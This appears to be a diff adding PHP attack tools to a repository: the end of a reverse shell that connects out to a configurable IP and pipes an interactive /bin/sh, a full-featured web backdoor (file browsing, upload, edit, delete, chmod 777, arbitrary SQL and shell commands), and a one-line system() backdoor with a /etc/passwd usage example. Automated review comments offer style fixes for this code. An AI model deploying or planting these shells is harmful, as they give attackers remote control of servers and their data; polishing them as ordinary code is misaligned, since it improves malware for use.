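+// proc_open and stream_set_blocking require PHP version 4.3+, or 5+
+// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.
+// Some compile-time options are needed for daemonisation (like pcntl, posix). These are rarely available.
+//
+// Usage
+// -----
+// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.
+set_time_limit (0);
+$VERSION = "1.0";
+$ip = '127.0.0.1'; // CHANGE THIS
+$port = 1234; // CHANGE THIS
+$chunk_size = 1400;
+$write_a = null;
+$error_a = null;
+$shell = 'uname -a; w; id; /bin/sh -i';
+$daemon = 0;
+$debug = 0;
+//
+// Daemonise ourself if possible to avoid zombies later
+//
+// pcntl_fork is hardly ever available, but will allow us to daemonise
+// our php process and avoid zombies. Worth a try...
+if (function_exists('pcntl_fork')) {
+// Fork and have the parent process exit
+$pid = pcntl_fork();
+if ($pid == -1) {
+printit("ERROR: Can't fork");
+exit(1);
+}
+if ($pid) {
+exit(0); // Parent exits
+}
+// Make the current process a session leader
+// Will only succeed if we forked
+if (posix_setsid() == -1) {
+printit("Error: Can't setsid()");
+exit(1);
+}
+$daemon = 1;
+} else {
+printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
+}
+// Change to a safe directory
+chdir("/");
+// Remove any umask we inherited
+umask(0);
+//
+// Do the reverse shell...
+//
+// Open reverse connection
+$sock = fsockopen($ip, $port, $errno, $errstr, 30);
+if (!$sock) {
+printit("$errstr ($errno)");
+exit(1);
+}
+// Spawn shell process
+$descriptorspec = array(
+0 => array("pipe", "r"), // stdin is a pipe that the child will read from
+1 => array("pipe", "w"), // stdout is a pipe that the child will write to
+2 => array("pipe", "w") // stderr is a pipe that the child will write to
+);
+$process = proc_open($shell, $descriptorspec, $pipes);
+if (!is_resource($process)) {
+printit("ERROR: Can't spawn shell");
+exit(1);
+}
+// Set everything to non-blocking
+// Reason: Occsionally reads will block, even though stream_select tells us they won't
+stream_set_blocking($pipes[0], 0);
+stream_set_blocking($pipes[1], 0);
+stream_set_blocking($pipes[2], 0);
+stream_set_blocking($sock, 0);
+printit("Successfully opened reverse shell to $ip:$port");
+while (1) {
+// Check for end of TCP connection
+if (feof($sock)) {
+printit("ERROR: Shell connection terminated");
+break;
+}
+// Check for end of STDOUT
+if (feof($pipes[1])) {
+printit("ERROR: Shell process terminated");
+break;
+}
+// Wait until a command is end down $sock, or some
+// command output is available on STDOUT or STDERR
+$read_a = array($sock, $pipes[1], $pipes[2]);
+$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
+// If we can read from the TCP socket, send
+// data to process's STDIN
+if (in_array($sock, $read_a)) {
+if ($debug) printit("SOCK READ");
+$input = fread($sock, $chunk_size);
+if ($debug) printit("SOCK: $input");
+fwrite($pipes[0], $input);
+}
+// If we can read from the process's STDOUT
+// send data down tcp connection
+if (in_array($pipes[1], $read_a)) {
+if ($debug) printit("STDOUT READ");
+$input = fread($pipes[1], $chunk_size);
+if ($debug) printit("STDOUT: $input");
+fwrite($sock, $input);
+}
+// If we can read from the process's STDERR
+// send data down tcp connection
+if (in_array($pipes[2], $read_a)) {
+if ($debug) printit("STDERR READ");
+$input = fread($pipes[2], $chunk_size);
+if ($debug) printit("STDERR: $input");
+fwrite($sock, $input);
+}
+}
+fclose($sock);
+fclose($pipes[0]);
+fclose($pipes[1]);
+fclose($pipes[2]);
+proc_close($process);
+// Like print, but does nothing if we've daemonised ourself
+// (I can't figure out how to redirect STDOUT like a proper daemon)
+function printit ($string) {
+if (!$daemon) {
+print "$string\n";
+}
+}
+?>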
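Review bot: `printit` tests `$daemon`, but inside a PHP function that name is an undefined local rather than the file-level `$daemon` that is set to `1` after `posix_setsid()`, so `!$daemon` is always true and the comment `Like print, but does nothing if we've daemonised ourself` describes behaviour the code does not have; either add `global $daemon;` as the first line of `printit` or correct the comment. `$VERSION = "1.0";` and `$num_changed_sockets` are assigned and never read. The comment above `$write_a` / `$error_a` would also help a reader: they are deliberately `null` so that `stream_select` only watches the read set, which is not obvious from the declarations.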

429
php/qsd-php-backdoor.php Normal file

@ -0,0 +1,429 @@
<?php
// A robust backdoor script made by Daniel Berliner - http://www.qsdconsulting.com/ [3-15-2011]
// This code is public domain and may be used in part or in full for any legal purpose. I would still appreciate a mention though :).
function isLinux($path)
{
return (substr($path,0,1)=="/" ? true : false);
}
function getSlashDir($isLinux)
{
return($isLinux ? '/' : '\\');
}
//See if we are on Linux or Windows becuase the paths have to be processed differently
$cwd=getcwd();
$isLinux=isLinux($cwd);
if(!$isLinux)
{
$driveLetter=substr($cwd,0,1);
}
$slash=getSlashDir($isLinux);
$parts=explode($slash,$cwd);
$rootDir=($isLinux ? $slash : ($driveLetter . ':' . $slash));
function cleanPath($path,$isLinux)
{
$slash=getSlashDir($isLinux);
$parts=explode($slash,$path);
foreach($parts as $key=>$val)//Process .. directories and a single .
{
if($val=="..")
{
$parts[$key]="";
$lastKey=$key-1;
$parts[$lastKey]="";
}
elseif($val==".")
{
$parts[$key]="";
}
}
reset($parts);
$fixedPath=($isLinux ? "/" : "");//Some PHP configs wont automatically create a variable on .= or will at least whine about it
$firstPiece=true;
foreach($parts as $val)//Assemble the path back together
{
if($val != "")
{
$fixedPath .= ($firstPiece ? '' : $slash) . $val;
$firstPiece=false;
}
}
if($fixedPath=="")//If we took out the entire path go to bottom level to avoid an error
{
$fixedPath=($isLinux ? $slash : ($driveLetter . ":" . $slash));
}
//Make sure there is an ending slash
if(substr($fixedPath,-1)!=$slash)
$fixedPath .= $slash;
return $fixedPath;
}
if(isset($_REQUEST['chm']))
{
if(!$isLinux)
{
echo "This feature only works on Linux";
}
else
{
echo (@chmod ( $_REQUEST['chm'] , 0777 ) ? "Reassigned" : "Can't Reasign");
}
}
elseif(isset($_REQUEST['phpinfo']))
{
phpinfo();
}
elseif(isset($_REQUEST['dl']))
{
if(@fopen($_REQUEST['dl'] . $_REQUEST['file'],'r')==true)
{
$_REQUEST['dl'] .= $_REQUEST['file'];
if(substr($_REQUEST['dl'],0,1)==$slash)
$fileArr=explode($slash,$_REQUEST['dl']);
header('Content-disposition: attachment; filename=' . $_REQUEST['file']);
header('Content-type: application/octet-stream');
readfile($_REQUEST['dl']);
}
else
{
echo $_REQUEST['dl'];
}
}
elseif(isset($_REQUEST["gz"]))
{
if(!$isLinux)
{
echo "This feature only works on Linux";
}
else
{
$directory=$_REQUEST["gz"];
if(substr($directory,-1)=="/")
$directory = substr($directory,0,-1);
$dirParts=explode($slash,$directory);
$fname=$dirParts[(sizeof($dirParts)-1)];
$archive = time();
exec( "cd $directory; tar czf $archive *");
$output=@file_get_contents($directory . "/" . $archive);
if(!$output)
header("Content-disposition: attachment; filename=ACCESS_PROBLEM");
else
{
header("Content-disposition: attachment; filename=$fname.tgz");
echo $output;
}
header('Content-type: application/octet-stream');
@unlink($directory . "/" . $archive);
}
}
elseif(isset($_REQUEST['f']))
{
$filename=$_REQUEST['f'];
$file=fopen("$filename","rb");
header("Content-Type: text/plain");
fpassthru($file);
}
elseif(isset($_REQUEST['d']))
{
$d=$_REQUEST['d'];
echo "<pre>";
if ($handle = opendir("$d"))
{
echo "<h2>listing of ";
$conString="";
if($isLinux)
echo "<a href='?d=$slash'>$slash</a>";
foreach(explode($slash,cleanPath($d,$isLinux)) as $val)
{
$conString .= $val . $slash;
echo "<a href='?d=$conString'>" . $val . "</a>" . ($val != "" ? $slash : '');
}
echo " (<a target='_blank' href='?uploadForm=1&dir=" . urlencode(cleanPath($d,$isLinux)) . "'>upload file</a>) (<a href='?d=" . urlencode(cleanPath($d,$isLinux)) . "&hldb=1'>DB interaction files in red</a>)</h2> (<a target='_blank' href='?gz=" . urlencode(cleanPath($d,$isLinux)) . "'>gzip & download folder</a>) (<a target='_blank' href='?chm=" . urlencode(cleanPath($d,$isLinux)) . "'>chmod folder to 777)</a> (these rarely work)<br />";
while ($dir = readdir($handle))
{
if (is_dir("$d$slash$dir"))
{
if($dir != "." && $dir !="..")
$dirList[]=$dir;
}
else
{
if(isset($_REQUEST["hldb"]))
{
$contents=file_get_contents("$d$slash$dir");
if (stripos($contents, "mysql_") || stripos($contents, "mysqli_") || stripos($contents, "SELECT "))
{
$fileList[]=array('dir'=>$dir,'color'=>'red');
}
else
{
$fileList[]=array('dir'=>$dir,'color'=>'black');
}
}
else
{
$fileList[]=array('dir'=>$dir,'color'=>'black');
}
}
}
echo "<a href='?d=$d$slash.'><font color=grey>.\n</font></a>";
echo "<a href='?d=$d$slash..'><font color=grey>..\n</font></a>";
//Some configurations throw a notice if is_array is tried with a non-existant variable
if(isset($dirList))
if(is_array($dirList))
foreach($dirList as $dir)
{
echo "<a href='?d=$d$slash$dir'><font color=grey>$dir\n</font></a>";
}
if(isset($fileList))
if(is_array($fileList))
foreach($fileList as $dir)
{
echo "<a href='?f=$d" . $slash . $dir['dir'] . "'><font color=" . $dir['color'] . ">" . $dir['dir'] . "</font></a>" .
"|<a href='?dl=" . cleanPath($d,$isLinux) . '&file=' .$dir["dir"] . "' target='_blank'>Download</a>|" .
"|<a href='?ef=" . cleanPath($d,$isLinux) . '&file=' .$dir["dir"] . "' target='_blank'>Edit</a>|" .
"|<a href='?df=" . cleanPath($d,$isLinux) . '&file=' .$dir["dir"] . "' target='_blank'>Delete</a>| \n";
}
}
else
echo "opendir() failed";
closedir($handle);
}
elseif(isset($_REQUEST['c']))
{
if( @ini_get('safe_mode') )
{
echo 'Safe mode is on, the command is by default run though escapeshellcmd() and can only run programms in safe_mod_exec_dir (' . @ini_get('safe_mode_exec_dir') . ') <br />';
}
echo "<b>Command: <I>" . $_REQUEST['c'] . "</I></b><br /><br />";
trim(exec($_REQUEST['c'],$return));
foreach($return as $val)
{
echo '<pre>' . htmlentities($val) . '</pre>';
}
}
elseif(isset($_REQUEST['uploadForm']) || isset($_FILES["file_name"]))
{
if(isset($_FILES["file_name"]))
{
if ($_FILES["file_name"]["error"] > 0)
{
echo "Error";
}
else
{
$target_path = $_COOKIE["uploadDir"];
if(substr($target_path,-1) != "/")
$target_path .= "/";
$target_path = $target_path . basename( $_FILES['file_name']['name']);
if(move_uploaded_file($_FILES['file_name']['tmp_name'], $target_path)) {
setcookie("uploadDir","");
echo "The file ". basename( $_FILES['file_name']['name']).
" has been uploaded";
}
else
{
echo "Error copying file, likely a permission error.";
}
}
}
else
{
?>
<form target="_blank" action="" method="GET">
<input type="hidden" name="cc" value="1" />
Submit this form before submitting file (will open in new window):<br />
Upload Directory: <input type="text" name="dir" value="<?php echo $_REQUEST["dir"] ?>"><br />
<input type="submit" value="submit" />
</form>
<br /><br />
<form enctype="multipart/form-data" action="" method="post">
Upload file:<input name="file_name" type="file"> <input type="submit" value="Upload" /></form>
<?php
}
}
elseif(isset($_REQUEST['cc']))
{
setcookie("uploadDir",$_GET["dir"]);
echo "You are OK to upload the file, don't upload files to other directories before completing this upload.";
}
elseif(isset($_REQUEST['mquery']))
{
$host=$_REQUEST['host'];
$usr=$_REQUEST['usr'];
$passwd=$_REQUEST['passwd'];
$db=$_REQUEST['db'];
$mquery=$_REQUEST['mquery'];
@mysql_connect($host, $usr, $passwd) or die("Connection Error: " . mysql_error());
mysql_select_db($db);
$result = mysql_query($mquery);
if($result!=false)
{
echo "<h2>The following query has sucessfully executed</h2>" . htmlentities($mquery) . "<br /><br />";
echo "Return Results:<br />";
$first=true;
echo "<table border='1'>";
while ($row = mysql_fetch_array($result,MYSQL_ASSOC))
{
if($first)
{
echo "<tr>";
foreach($row as $key=>$val)
{
echo "<td><b>$key</b></td>";
}
echo "</tr>";
reset($row);
$first=false;
}
echo "<tr>";
foreach($row as $val)
{
echo "<td>$val</td>";
}
echo "</tr>";
}
echo "</table>";
mysql_free_result($result);
}
else
{
echo "Query Error: " . mysql_error();
}
}
elseif(isset($_REQUEST['df']))
{
$_REQUEST['df'] .= $slash . $_REQUEST['file'];
if(@unlink($_REQUEST['df']))
{
echo "File deleted";
}
else
{
echo "Error deleting file";
}
}
elseif(isset($_REQUEST['ef']))
{
?>
<script type="text/javascript">
<!--
var key = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
function encode64(inpStr)
{
inpStr = escape(inpStr);
var output = "";
var chr1, chr2, chr3 = "";
var enc1, enc2, enc3, enc4 = "";
var i = 0;
do {
chr1 = inpStr.charCodeAt(i++);
chr2 = inpStr.charCodeAt(i++);
chr3 = inpStr.charCodeAt(i++);
enc1 = chr1 >> 2;
enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
enc4 = chr3 & 63;
if (isNaN(chr2))
{
enc3 = enc4 = 64;
}
else if (isNaN(chr3))
{
enc4 = 64;
}
output = output +
key.charAt(enc1) +
key.charAt(enc2) +
key.charAt(enc3) +
key.charAt(enc4);
chr1 = chr2 = chr3 = enc1 = enc2 = enc3 = enc4 = "";
} while (i < inpStr.length);
return output;
}
//--></script>
<?php
$_REQUEST['ef'] .= $_REQUEST['file'];
if(isset($_POST["newcontent"]))
{
$_POST["newcontent"]=urldecode(base64_decode($_POST["newcontent"]));
$stream=@fopen($_REQUEST['ef'],"w");
if($stream)
{
fwrite($stream,$_POST["newcontent"]);
echo "Write sucessful";
}
else
{
echo "Could not write to file";
}
fclose($stream);
}
?>
<form action="" name="f" method="POST">
<textarea wrap="off" rows="40" cols="130" name="newcontent"><?php echo file_get_contents($_REQUEST['ef']) ?></textarea><br />
<input type="submit" value="I base64 encoded it myself, dont run script" /><br />
<input type="submit" value="Change (requires javascript to work)" onclick="document.f.newcontent.value=encode64(document.f.newcontent.value);" />
</form>
<?php
}
else
{
?>
<b>Server Information:</b><br />
<i>
Operating System: <?php echo PHP_OS ?><br />
PHP Version: <?php echo PHP_VERSION ?><br />
<a href="?phpinfo=true">View phpinfo</a>
</i>
<br />
<br />
<b>Directory Traversal</b><br />
<a href="?d=<?php echo getcwd() ?>"><b>Go to current working directory</b></a> <br />
<a href="?d=<?php echo $rootDir ?>"><b>Go to root directory</b></a> <br />
<b>Go to any directory:</b> <form action="" method="GET"><input type="text" name="d" value="<?php echo $rootDir ?>" /><input type="submit" value="Go" /></form>
<hr>Execute MySQL Query:
<form action="" METHOD="GET" >
<table>
<tr><td>host</td><td><input type="text" name="host"value="localhost"> </td></tr>
<tr><td>user</td><td><input type="text" name="usr" value="root"> </td></tr>
<tr><td>password</td><td><input type="text" name="passwd"> </td></tr>
<tr><td>database</td><td><input type="text" name="db"> </td></tr>
<tr><td valign="top">query</td><td><textarea name="mquery" rows="6" cols="65"></textarea> </td></tr>
<tr><td colspan="2"><input type="submit" value="execute"></td></tr>
</table>
</form>
<hr>
<pre><form action="" METHOD="GET" >Execute Shell Command (safe mode is <?php echo (@ini_get('safe_mode') ? 'on' : 'off') ?>): <input type="text" name="c"><input type="submit" value="Go"></form>
<?php
}
//Intentionally left open to avoid output the file download function 1

17
php/simple-backdoor.php Normal file

@ -0,0 +1,17 @@
<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->
<?php
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
?>
Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
<!-- http://michaeldaw.org 2006 -->
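Review bot: `$cmd = ($_REQUEST['cmd']);` wraps a plain variable read in parentheses that do nothing; `$cmd = $_REQUEST['cmd'];` is the same statement. For readers of this collection it is also worth a comment that the author banner on the first line sits outside the `<?php` block and is therefore part of the response body on every request, whereas the trailing `Usage:` line and the closing HTML comment are only sent when no `cmd` parameter is present, because the `die;` inside the `if` ends output right after `</pre>`. A one-line note such as `<!-- banner above is emitted on every response; the lines below only when cmd is absent -->` placed before the `Usage:` line would make that visible without reading the control flow.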